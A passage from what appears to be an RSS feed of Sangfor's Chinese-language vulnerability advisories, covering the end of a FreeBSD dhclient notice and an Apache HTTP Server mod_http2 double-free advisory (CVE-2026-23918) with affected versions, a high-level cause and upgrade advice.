leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041899" src="https://wechat2rss.xlab.app/img-proxy/?k=ee4c6262&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSQ0ICRwFJeN3tRchNcG0wtC7ib08Kib9YqNy2cMsKcDRhKXyJnx0qT0q1Uicle0tx0M3u1MRjCgdLQU2QPkdApBia9eVlnJiaam1ns%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">风险资产发现</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对FreeBSD的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf=""> 已发布资产检测方案，指纹ID:0032404。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0032404。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://aisle.com/blog/aisle-discovers-cve-2026-42511-a-21-year-old-freebsd-remote-command-execution-vulnerability" target="_blank">https://aisle.com/blog/aisle-discovers-cve-2026-42511-a-21-year-old-freebsd-remote-command-execution-vulnerability</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/09</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到FreeBSD dhclient 远程代码执行信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/09</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041902" data-ratio="0.5314814814814814" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=dd4e5e38&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxRkAHxz3dy3mCjsJCq7HJ0hlLXCkn7RZKsSfspmvxeOBNCwu6QDYVSN58ZhJibOibZQicHjSeuUib7XibBX43Tk3KQRlghGDLlIDPME%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16349%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=087421c9&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525551%26idx%3D1%26sn%3De0910e9cbc4926fc58dc4fca4045af92">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 09 May 2026 18:17:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Apache HTTP Server mod_http2 双重释放漏洞(CVE-2026-23918)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525526&amp;idx=1&amp;sn=07ac03abdde556813ff744b9ca642ed8</link>
      <description>2026年5月7日，Apache Http Server组件披露内存破坏漏洞，漏洞编号：CVE-2026-23918，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-05-08 16:49</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=2e1d842d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxRV53yLRosiaDhJ9D9Oxl5fYtdiaEASpXUlqFE4myN8KruPIYW8z1el9Xic6Khs4x624BIH7rUAicElrhqDpQX3ggxCYcl3XHc0zA4%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年5月7日，Apache Http Server组件披露内存破坏漏洞，漏洞编号：CVE-2026-23918，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041856" src="https://wechat2rss.xlab.app/img-proxy/?k=bd177d10&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSXvKYficnBnajtx7w1Y6BS18ax6Uib6Y9BKt9RFfrTWKcibod3wrxzxgpEZbxgaxnicGX7MeoyFEL3dicSUmRBIUgAJ1mWicPN9Nfa0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache HTTP Server mod_http2 双重释放漏洞(CVE-2026-23918)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache Http Server</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache Http Server = 2.4.66</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">内存破坏</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：无需用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">采用 event/worker 多线程 MPM；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">服务开启 HTTP/2 并加载 mod_http2 模块。</span></p></li></ul><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：容易，无需授权即可造成拒绝服务。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，可造成拒绝服务。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041854" src="https://wechat2rss.xlab.app/img-proxy/?k=5bedac9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxS8liaUmybJ2sEQLSN4XLhA9FczyhA4KGibnKmBEmQ4ISRYdIUrwJObMSHatBupzHdm30Nm4IU1ovghvXE5iboQVdHTxGFAIydFds%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache HTTP Server（简称Apache），是Apache软件基金会的一个开放源代码的网页服务器，可以在大多数电脑操作系统中运行，由于其具有的跨平台性和安全性，被广泛使用，是最流行的Web服务器端软件之一。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041855" src="https://wechat2rss.xlab.app/img-proxy/?k=4711d912&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRzfmXicpnep3cn1mV7buL3289SS0Nfvgb5voNgJaP3CWyahA8Pda42SD4bwUMSib6cGHLvFTHyd2ornENLaIK2yIGuPOQBhbIHM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年5月7日，Apache Http Server组件披露内存破坏漏洞，漏洞编号：CVE-2026-23918，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache httpd 中存在双重释放漏洞,该漏洞源于 mod_http2 模块在处理 HTTP/2 协议早期重置帧的业务逻辑时存在内存管理缺陷，程序未对内存指针做合法校验与释放状态判断，处理异常 HTTP/2 数据流时对同一堆内存地址执行了两次释放操作，形成典型 Double Free 内存破坏问题，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">攻击者可远程构造恶意 HTTP/2 请求触发该漏洞，破坏堆内存结构，轻则造成拒绝服务，特定环境下还可借助内存布局可控特性实现远程代码执行。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache Http Server = 2.4.66</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041852" src="https://wechat2rss.xlab.app/img-proxy/?k=09dd7ceb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxShHZ75icxP3j71iaams4n4WbbT2hQSJ1vwNSQ44GfKpr2raIusZQv1tibLeDM6YfGSjiaykww2VbWqPZpicicItbEVHACNoS6p7xPB0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将 Apache HTTP Server 更新到 2.4.67 或更高版本。</span><span leaf=""><br/></span><span leaf="">参考链接：<a href="https://httpd.apache.org/security/vulnerabilities_24.html" target="_blank">https://httpd.apache.org/security/vulnerabilities_24.html</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041853" src="https://wechat2rss.xlab.app/img-proxy/?k=0fcb9f56&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTuEUsea3LQ5R8qSPibkOVpwMSSn6GxUGRnoLgFUQW2JNAott6oL5zUJLbBlubJaBYIYGGlWXNI9AxE35EluibUfdCfQ2lXFwxibU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span 